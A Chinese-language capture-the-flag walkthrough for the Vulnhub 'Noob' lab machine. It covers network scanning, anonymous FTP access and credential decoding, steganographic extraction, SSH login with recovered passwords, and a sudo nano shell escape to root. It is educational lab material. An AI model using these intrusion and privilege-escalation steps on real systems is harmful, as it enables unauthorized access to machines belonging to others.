先下载靶机
靶机地址:https://www.vulnhub.com/entry/noob-1,746/
收集信息
1.发现靶机IP
首先查看kaili的IP
靶机要和kali在同一模式下(NAT)
靶机ip
arp-scan --interface=eth0 --localnet
这里也是找到了IP
2.端口扫描
nmap -sS -sV -T4 -A -p- 192.168.239.9
有21 80 55077的ssh服务端口
信息分析
1.分析端口
尝试在这个几个端口里获取信息
21端口
匿名访问:
- 匿名 FTP 登录是允许的(FTP代码230)。
- 匿名用户可以访问到两个文件:
cred.txt
(21字节,2021年9月21日创建)welcome
(86字节,2021年6月11日创建
我们匿名登录FTP
用户名:anonymous or ftp
密码:随便输入一个邮箱格式的字符串 or anonymous@example.com
┌──(root㉿kali)-[~]
└─# ftp 192.168.239.9
Connected to 192.168.239.9.
220 (vsFTPd 3.0.3)
Name (192.168.239.9:root): anonymous
331 Please specify the password.
Password:
这里就是将两个文件下载下来
ftp> ls
229 Entering Extended Passive Mode (|||31254|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 21 Sep 21 2021 cred.txt
-rw-r--r-- 1 0 0 86 Jun 11 2021 welcome
226 Directory send OK.
ftp> get cred.txt
local: cred.txt remote: cred.txt
229 Entering Extended Passive Mode (|||39331|)
150 Opening BINARY mode data connection for cred.txt (21 bytes).
100% |***************************************************************************************************************************| 21 24.64 KiB/s 00:00 ETA
226 Transfer complete.
21 bytes received in 00:00 (15.07 KiB/s)
ftp> get welcome
local: welcome remote: welcome
229 Entering Extended Passive Mode (|||28604|)
150 Opening BINARY mode data connection for welcome (86 bytes).
100% |***************************************************************************************************************************| 86 415.76 KiB/s 00:00 ETA
226 Transfer complete.
86 bytes received in 00:00 (157.86 KiB/s)
ftp> exit
221 Goodbye.
查看文件内容
将这个解码:
champ:password
80端口 发现登页面
可以用上述得到的密码
发现是可以登录上的
这里我用wappalyzer 看一下网站信息
再看看网站有其他的信息
发现 点击About us 会下载一个文件
解压得到三个东西
两张图片的格式不同 总感觉这里面藏了些什么
这里我用 steghide工具 发现了 user.txt
这里的密码我用的是sudo
用steghide extract -sf funny.bmp来提取隐藏的文件user.txt
steghide extract -sf funny.bmp
得到一串字符
同理funny,jpg 也有隐藏的文件但是不需要密码 ,这里是一段提醒
这不是一个 Python 文件,但你却在围绕它打转。
好吧,也试着旋转一些单词吧。
这里回想到我们上面得到的字符串 ;我们试试解密
jgs:guvf bar vf n fvzcyr bar
解密得
wtf:this one is a simple one
搞到这里忽然没有头绪了,但回头看还有一个端口是ssh的 尝试一下
ssh wtf@192.168.239.9 -p 55077
密码是:this one is a simple one
在wtf用户下也是顺利的找到了第一个falg
VGhlIGZsYWcgaXMgdGhlIGVuY29kZWQgc3RyaW5nIGl0c2VsZg
base64解得:
The flag is the encoded string itsel 还有其他的flag
在Documents文件下找到了 backup.sh 脚本 找到了一个用户名和密码
USER=n00b
#aw3s0m3p@$$w0rd
登录到n00b
真服了,怎么还骂人呢
提权
这里提示可以用nano
查看nano可以使用二进制以超级用户运行sudo
- sudo nano
- ctrl+r ,Ctrl+x
- 输入
reset; sh 1>&0 2>&0
按回车即可
完成!!!祝你好运!!!!
标签:ftp,00,21,--,cred,Vulnhub,靶场,txt,N00b From: https://blog.csdn.net/weixin_53974661/article/details/144670274